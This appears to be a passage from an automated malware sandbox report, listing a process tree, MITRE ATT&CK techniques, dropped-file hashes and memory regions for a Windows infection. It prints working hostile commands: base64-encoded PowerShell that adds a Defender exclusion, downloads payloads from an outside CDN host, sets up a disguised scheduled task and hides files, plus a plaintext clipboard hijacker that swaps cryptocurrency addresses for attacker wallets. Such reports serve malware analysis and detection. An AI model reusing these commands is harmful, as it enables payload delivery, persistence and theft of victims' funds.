AcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA==
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADYAOAA3ADgAMAA5ADQANQAyADQANQA2ADMANAA5ADYALwA3AHoALgBkAGwAbAAnACwAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcADcAegAuAGQAbABsACcAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADEAOQA0ADkANQA4ADUAMgA0ADIAOQA4ADAAMwA2ADYALwAxADAAMgA2ADgANwA4ADAAOQA0ADgANwAyADYAOQA0ADcAOAA0AC8ANwB6AC4AZQB4AGUAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXAA3AHoALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIAOQA4ADcANgA3ADcANQA4ADIANQA3ADIAMwA0ADQAMgAvAFUAcABkAGEAdABlAC4AbQBzAGkAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBwAG4AZwAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcADcAegAuAGUAeABlACcAIAB4ACAALQBvAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAEkAbgBzAHQAYQBsAGwAVQB0AGkAbAAuAHAAbgBnACAALQBwAHgAIAAtAHkAOwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAEkAbgBzAHQAYQBsAGwAVQB0AGkAbAAuAGUAeABlADsAYwBtAGQALgBlAHgAZQAgAC8AYwAgAGMAaABvAGkAYwBlACAALwBjACAAeQAgAC8AbgAgAC8AZAAgAHkAIAAvAHQAIAAzACAAIgAmACIAIABkAGUAbAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAzADAAOAA1ADcAMAAwADgAMAAwADMANAAyADAAMgAwADAALwBLAEIANAAwADgANwA2ADQAMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwASwBCADQAMAA4ADcANgA0ADIALgBoAHQAYQAnACkAOwBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAEsAQgA0ADAAOAA3ADYANAAyAC4AaAB0AGEAOwBjAG0AZAAuAGUAeABlACAALwBjACAAYwBoAG8AaQBjAGUAIAAvAGMAIAB5ACAALwBuACAALwBkACAAeQAgAC8AdAAgADMAIAAiACYAIgAgAGQAZQBsACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAEsAQgA0ADAAOAA3ADYANAAyAC4AaAB0AGEAIgA=
1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\Google\7z.exe x -oC:\ProgramData\Google\ C:\ProgramData\Google\InstallUtil.png -px -y
2⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\ProgramData\Google\7z.exe
C:\ProgramData\Google\7z.exe x -oC:\ProgramData\Google\ C:\ProgramData\Google\InstallUtil.png -px -y
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\ProgramData\Google\InstallUtil.exe
"C:\ProgramData\Google\InstallUtil.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\ProgramData\Google\InstallUtil.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:728

C:\Windows\SysWOW64\choice.exe
choice /c y /n /d y /t 3
3⤵
PID:4476

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Windows\Temp\KB4087642.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
- Checks computer location settings
PID:3964

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im mshta.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ErrorActionPreference=0;function IAzYdQWD(){return [System.Windows.Forms.Clipboard]::GetText()}function bdMEmtEk($nHfZFvssK){[System.Windows.Forms.Clipboard]::SetText($nHfZFvssK)}function OCMdZroNe($nHfZFvssK){[Regex]$NzoburBW='^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$';$PKJscVRn=$nHfZFvssK -match $NzoburBW;return $PKJscVRn}function XvCYJLFGb($nHfZFvssK){[Regex]$NzoburBW='^(bc1)(?:[a-z0-9]{39}|[a-z0-9]{59})$';$PKJscVRn=$nHfZFvssK -match $NzoburBW;return $PKJscVRn}function EcVeupTnZ($nHfZFvssK){[Regex]$oPiGqGno='^0x[a-fA-F0-9]{40}$';$PKJscVRn=$nHfZFvssK -match $oPiGqGno;return $PKJscVRn}function MDKcbpBE(){$EShVkpTS='bc1qpz7pd3dh5cdyu9amau2uw52y9gvl2w3f39ae6c';return $EShVkpTS}function XHyPDZGW(){$knnrHblq='0x17e3B53F7B8e4b5eB1007eAAFfFd93Bfd20FD60C';return $knnrHblq}function YRMHLYBOD(){Add-Type -AssemblyName System.Windows.Forms;$EShVkpTS=MDKcbpBE;$knnrHblq=XHyPDZGW;$eJWvTwDb=New-Object System.Threading.Mutex($False, $EShVkpTS);$ewFsMGeQK=$eJWvTwDb.WaitOne(1);if($ewFsMGeQK -eq $True){while($True){$hAnXeWPw=$False;$bxUPUBFjI=$False;$KHNrkMkE=IAzYdQWD;$oxtgqZtM=$KHNrkMkE.Length;if($oxtgqZtM -in 26..35 -and $KHNrkMkE -ne $EShVkpTS){$hAnXeWPw=OCMdZroNe $KHNrkMkE}elseif($oxtgqZtM -eq 42 -or $oxtgqZtM -eq 62){if($KHNrkMkE -ne $EShVkpTS){$hAnXeWPw=XvCYJLFGb $KHNrkMkE}$dalvLlKZ=$Null;if($KHNrkMkE -ne $knnrHblq){$bxUPUBFjI=EcVeupTnZ $KHNrkMkE}}$dalvLlKZ=$Null;if($hAnXeWPw){bdMEmtEk $EShVkpTS}elseif($bxUPUBFjI){bdMEmtEk $knnrHblq}Start-Sleep 0.51}}else{Exit}}YRMHLYBOD;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\Windows\Temp\KB4087642.hta
2⤵
PID:4524

C:\Windows\SysWOW64\choice.exe
choice /c y /n /d y /t 3
3⤵
PID:4600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y & Del "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\Windows\system32\choice.exe
choice /c y /n /d y
2⤵
PID:3820

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADMAOQA0ADkANgAzADUAMQA5ADIAMQAxADEAMQA2ADQALwBjAG0AZAAuAG0AcwBpACcALAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIAOAA0ADMAOAA4ADIAMAA2ADUANwA1ADYAMQA2ADUAMAAvAHgAbQBsAG8AMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AeABtAGwAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAiACAALwB0AG4AIAAiAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsAIgAgAC8AZgA7AGMAbQBkAC4AZQB4AGUAIAAvAGMAIABkAGUAbAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXAAuAHgAbQBsACIAOwBjAG0AZAAuAGUAeABlACAALwBjACAAYQB0AHQAcgBpAGIAIAArAGgAIAArAFMAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACIA
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
3⤵
- Creates scheduled task(s)
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
2⤵
PID:3372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +h +S C:\ProgramData\Google
2⤵
PID:4216

C:\Windows\SysWOW64\attrib.exe
attrib +h +S C:\ProgramData\Google
3⤵
- Views/modifies file attributes
PID:3132

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Google\7z.dll
Filesize
1.2MB

MD5
a65e53c974a4e61728ecb632339a0978

SHA1
27e6ec4f8e34b40f1e08503245700c182b918ce9

SHA256
ca8ab5aeef734f24a3c58bf10b3f0152c2ea1329b02d2730448693df563b4c6a

SHA512
b029962f08867496cd3fd5e9af4b0703dae918e938aee759aeffbb4184ea6d3e81e0878ba8957e80d30db5d7b6fc8598e68918a4d16b3d010f31a2e16417593e

Download Submit
C:\ProgramData\Google\7z.dll
Filesize
1.2MB

MD5
a65e53c974a4e61728ecb632339a0978

SHA1
27e6ec4f8e34b40f1e08503245700c182b918ce9

SHA256
ca8ab5aeef734f24a3c58bf10b3f0152c2ea1329b02d2730448693df563b4c6a

SHA512
b029962f08867496cd3fd5e9af4b0703dae918e938aee759aeffbb4184ea6d3e81e0878ba8957e80d30db5d7b6fc8598e68918a4d16b3d010f31a2e16417593e

Download Submit
C:\ProgramData\Google\7z.exe
Filesize
329KB

MD5
62d2156e3ca8387964f7aa13dd1ccd5b

SHA1
a5067e046ed9ea5512c94d1d17c394d6cf89ccca

SHA256
59cbfba941d3ac0238219daa11c93969489b40f1e8b38fabdb5805ac3dd72bfa

SHA512
006f7c46021f339b6cbf9f0b80cffa74abb8d48e12986266d069738c4e6bdb799bfba4b8ee4565a01e90dbe679a96a2399d795a6ead6eacbb4818a155858bf60

Download Submit
C:\ProgramData\Google\InstallUtil.exe
Filesize
3.0MB

MD5
e003ab2909b09650b4561998a8c2373c

SHA1
0971284baf4e3ed8a9e9cb71593a4916c277120a

SHA256
ad24d57793e0b9e240122989b0a1a73615080ca680b21c83bf48c92e43a9468c

SHA512
b46be73441bc364135e54d2fa71939c5c44a15517bfb0339d207820265d9354b99de3036cd436b7d98a25ae2399b8d8d8df5b4eae8cd37707ed68aafa618a6b5

Download Submit
C:\ProgramData\Google\InstallUtil.exe
Filesize
3.0MB

MD5
e003ab2909b09650b4561998a8c2373c

SHA1
0971284baf4e3ed8a9e9cb71593a4916c277120a

SHA256
ad24d57793e0b9e240122989b0a1a73615080ca680b21c83bf48c92e43a9468c

SHA512
b46be73441bc364135e54d2fa71939c5c44a15517bfb0339d207820265d9354b99de3036cd436b7d98a25ae2399b8d8d8df5b4eae8cd37707ed68aafa618a6b5

Download Submit
C:\ProgramData\Google\InstallUtil.png
Filesize
3.0MB

MD5
00612a3525e23ce4ca8f66281215f112

SHA1
a42c51f41344b0f66e9d0c2586012e9a750819d1

SHA256
8e4b6a9343e15ae6a5a904d557e768d43c6b516a4fb130c69ebb70f4b1937559

SHA512
7cd19418a4dd78e263afb527c56300669205ed0b8dc6a5e72be02f34d38329846179791f48dd10e1795f1c6467f67850a7bcbe1703cb16f1361b6daff7fe1281

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\ProgramData\Google\unzip.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\unzip.exe.log
Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
379B

MD5
c70b1fda5bf0872e610fbb6c5c8b54f6

SHA1
ecb042dc6e7aaa356ef7943f0af85b8664c1dab1

SHA256
f1e4b5fdbc4d1cdcf8989a6b9a283a6ace8288f50c170015cb3ba86ff80c0865

SHA512
54d28f5e9f63b2eec757dff0128957c5ca86e2c8e9e459328995b11c6f2e357feabb2fb73c11d991c2570e29f50d7d7bb217ed15791886d6122765fd34f25029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
92a47e848850e9d3cc77caee7d44f23d

SHA1
e51b1de3861e92b6d3f39939224f9caf0546b069

SHA256
6b3a895ce7ffe05adfb27418164512f2d1a3bde558a3bfa34bc5cd85a49b326f

SHA512
a4d4bfd348b8d8efb9f8a46ac1d3a89a03b74212d61aa0a027258844903ad2e528e83057a57f3a8e058e05ef7bb75af8076da7fce56a00d06c098c39364b3a7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
92a47e848850e9d3cc77caee7d44f23d

SHA1
e51b1de3861e92b6d3f39939224f9caf0546b069

SHA256
6b3a895ce7ffe05adfb27418164512f2d1a3bde558a3bfa34bc5cd85a49b326f

SHA512
a4d4bfd348b8d8efb9f8a46ac1d3a89a03b74212d61aa0a027258844903ad2e528e83057a57f3a8e058e05ef7bb75af8076da7fce56a00d06c098c39364b3a7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
Filesize
35KB

MD5
e98d234b604ff7176fbef3ad53d0c52a

SHA1
ea5afe92242146a39ecdd30c0d5add621ab92e78

SHA256
01245c0e4e55638082471bcc3091109cd3bb6ae0665e4f7e17488d54a04fba02

SHA512
274da7ec82c668efc68f0ab8277fa83c23f7f60ad1e668821360803e03bd6db468ad6aec8fa40cb4775b729db03af340f894b947e84eedd6cbe5987c49823235

Download Submit
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
Filesize
35KB

MD5
e98d234b604ff7176fbef3ad53d0c52a

SHA1
ea5afe92242146a39ecdd30c0d5add621ab92e78

SHA256
01245c0e4e55638082471bcc3091109cd3bb6ae0665e4f7e17488d54a04fba02

SHA512
274da7ec82c668efc68f0ab8277fa83c23f7f60ad1e668821360803e03bd6db468ad6aec8fa40cb4775b729db03af340f894b947e84eedd6cbe5987c49823235

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Windows\Temp\.xml
Filesize
20KB

MD5
fe3e6d7910c37944b7091f341489973b

SHA1
1de860645e978e934e7c6ffdae53829608765576

SHA256
21c267874a84108b7998d6653cd8866e1e32b2bd65dd03ce345d542d5e0cc703

SHA512
4fc836b6e2feed19a313ff507d4bd6e03282f5a981350e6decab276a861737ab0291645979c8ac70563f63d876c51a06ec469a97066c233694df7a0e9e24c6f1

Download Submit
C:\Windows\Temp\KB4087642.hta
Filesize
2KB

MD5
e0c95b7c058d99a5b6a5d7609dcd00d8

SHA1
6fe7908c39eb3a837d0d986b08a9b4a929b04af1

SHA256
2b66047c39392d4e0cb0a83bda9570be86ff93910b113ca0e6a68a16e94f5eee

SHA512
1d2f6b302f7a50ae472b222c194ce86595b88e6a3689269959a133d6fa88d5211626969b5df977023969a926ccf86cc38807681ad695afd2e1c7dabf0271a74e

Download Submit
memory/372-162-0x0000000000000000-mapping.dmp

Download
memory/448-192-0x0000000000000000-mapping.dmp

Download
memory/728-190-0x0000000000000000-mapping.dmp

Download
memory/1428-169-0x0000000007310000-0x000000000731A000-memory.dmp

Filesize
40KB

Download
memory/1428-174-0x00000000075D0000-0x00000000075EA000-memory.dmp

Filesize
104KB

Download
memory/1428-175-0x00000000075B0000-0x00000000075B8000-memory.dmp

Filesize
32KB

Download
memory/1428-155-0x00000000029B0000-0x00000000029E6000-memory.dmp

Filesize
216KB

Download
memory/1428-173-0x00000000074C0000-0x00000000074CE000-memory.dmp

Filesize
56KB

Download
memory/1428-172-0x0000000007510000-0x00000000075A6000-memory.dmp

Filesize
600KB

Download
memory/1428-167-0x00000000701D0000-0x000000007021C000-memory.dmp

Filesize
304KB

Download
memory/1428-168-0x0000000006540000-0x000000000655E000-memory.dmp

Filesize
120KB

Download
memory/1428-166-0x0000000006560000-0x0000000006592000-memory.dmp

Filesize
200KB

Download
memory/1652-187-0x0000000000000000-mapping.dmp

Download
memory/1764-163-0x0000000000000000-mapping.dmp

Download
memory/1824-134-0x0000000005810000-0x00000000058A2000-memory.dmp

Filesize
584KB

Download
memory/1824-133-0x0000000005F00000-0x00000000064A4000-memory.dmp

Filesize
5.6MB

Download
memory/1824-135-0x00000000058D0000-0x00000000058DA000-memory.dmp

Filesize
40KB

Download
memory/1824-138-0x0000000008490000-0x00000000084B2000-memory.dmp

Filesize
136KB

Download
memory/1824-132-0x0000000000D50000-0x0000000000F7E000-memory.dmp

Filesize
2.2MB

Download
memory/1824-137-0x00000000082C0000-0x0000000008372000-memory.dmp

Filesize
712KB

Download
memory/1824-136-0x0000000007FA0000-0x0000000007FF0000-memory.dmp

Filesize
320KB

Download
memory/2176-210-0x0000000000000000-mapping.dmp

Download
memory/2540-171-0x0000000000000000-mapping.dmp

Download
memory/3004-178-0x0000000000000000-mapping.dmp

Download
memory/3060-182-0x0000000000000000-mapping.dmp

Download
memory/3132-198-0x0000000000000000-mapping.dmp

Download
memory/3196-179-0x0000000000000000-mapping.dmp

Download
memory/3340-170-0x0000000000000000-mapping.dmp

Download
memory/3356-164-0x00000000076B0000-0x0000000007D2A000-memory.dmp

Filesize
6.5MB

Download
memory/3356-165-0x0000000006540000-0x000000000655A000-memory.dmp

Filesize
104KB

Download
memory/3372-194-0x0000000000000000-mapping.dmp

Download
memory/3472-185-0x0000000000000000-mapping.dmp

Download
memory/3772-195-0x0000000000000000-mapping.dmp

Download
memory/3820-160-0x0000000000000000-mapping.dmp

Download
memory/3964-206-0x0000000000000000-mapping.dmp

Download
memory/4048-197-0x0000000000000000-mapping.dmp

Download
memory/4216-196-0x0000000000000000-mapping.dmp

Download
memory/4276-145-0x0000000000000000-mapping.dmp

Download
memory/4276-157-0x00007FFF390D0000-0x00007FFF39B91000-memory.dmp

Filesize
10.8MB

Download
memory/4276-148-0x000001A9C39D0000-0x000001A9C39E0000-memory.dmp

Filesize
64KB

Download
memory/4276-151-0x00007FFF390D0000-0x00007FFF39B91000-memory.dmp

Filesize
10.8MB

Download
memory/4436-199-0x0000000000000000-mapping.dmp

Download
memory/4476-191-0x0000000000000000-mapping.dmp

Download
memory/4524-207-0x0000000000000000-mapping.dmp

Download
memory/4568-156-0x0000000005110000-0x0000000005738000-memory.dmp

Filesize
6.2MB

Download
memory/4568-158-0x0000000005830000-0x0000000005896000-memory.dmp

Filesize
408KB

Download
memory/4568-159-0x00000000058A0000-0x0000000005906000-memory.dmp

Filesize
408KB

Download
memory/4568-161-0x0000000006000000-0x000000000601E000-memory.dmp

Filesize
120KB

Download
memory/4600-208-0x0000000000000000-mapping.dmp

Download
memory/4648-193-0x0000000000000000-mapping.dmp

Download
memory/4668-220-0x000001439DE00000-0x000001439DE20000-memory.dmp

Filesize
128KB

Download
memory/4668-203-0x000001430B4A0000-0x000001430B4C0000-memory.dmp

Filesize
128KB

Download
memory/4668-204-0x00007FF6B4BD0000-0x00007FF6B53C4000-memory.dmp

Filesize
8.0MB

Download
memory/4668-205-0x000001430B5E0000-0x000001430B620000-memory.dmp

Filesize
256KB

Download
memory/4668-202-0x00007FF6B53C2120-mapping.dmp

Download
memory/4668-218-0x000001439DE00000-0x000001439DE20000-memory.dmp

Filesize
128KB

Download
memory/4668-217-0x000001439E240000-0x000001439E260000-memory.dmp

Filesize
128KB

Download
memory/4668-219-0x000001439E240000-0x000001439E260000-memory.dmp

Filesize
128KB

Download
memory/4668-216-0x000001439DE00000-0x000001439DE20000-memory.dmp

Filesize
128KB

Download
memory/4668-215-0x000001439DE00000-0x000001439DE20000-memory.dmp

Filesize
128KB

Download
memory/4668-214-0x00007FF6B4BD0000-0x00007FF6B53C4000-memory.dmp

Filesize
8.0MB

Download
memory/4808-211-0x0000000000000000-mapping.dmp

Download
memory/4860-149-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4860-144-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4860-143-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4860-141-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4860-142-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4860-140-0x0000000000000000-mapping.dmp

Download
memory/4872-139-0x0000000000000000-mapping.dmp

Download